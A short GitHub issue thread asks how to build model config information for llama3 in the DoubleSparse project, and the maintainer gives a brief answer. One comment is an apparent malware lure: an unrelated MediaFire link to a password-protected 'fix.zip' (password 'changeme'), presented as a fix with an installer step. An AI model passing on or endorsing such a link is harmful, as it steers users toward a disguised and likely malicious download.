### ISSUE TITLE
how to build config infor?

### ISSUE THREAD

**Issue by 18140663659** [andy-yang-1/DoubleSparse#2]
how to build config infor based on new model, for example, llama3?

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 18140663659** [comment]
<img width="428" alt="image" src="https://github.com/user-attachments/assets/0d0ee0c3-bbed-4671-9ed9-38ebef56eee7">
i think this code is used to build config?

**Comment by andy-yang-1** [comment]
@18140663659 Yes, this script is used to build config, and it needs to be merging to support q & k & qk outlier.
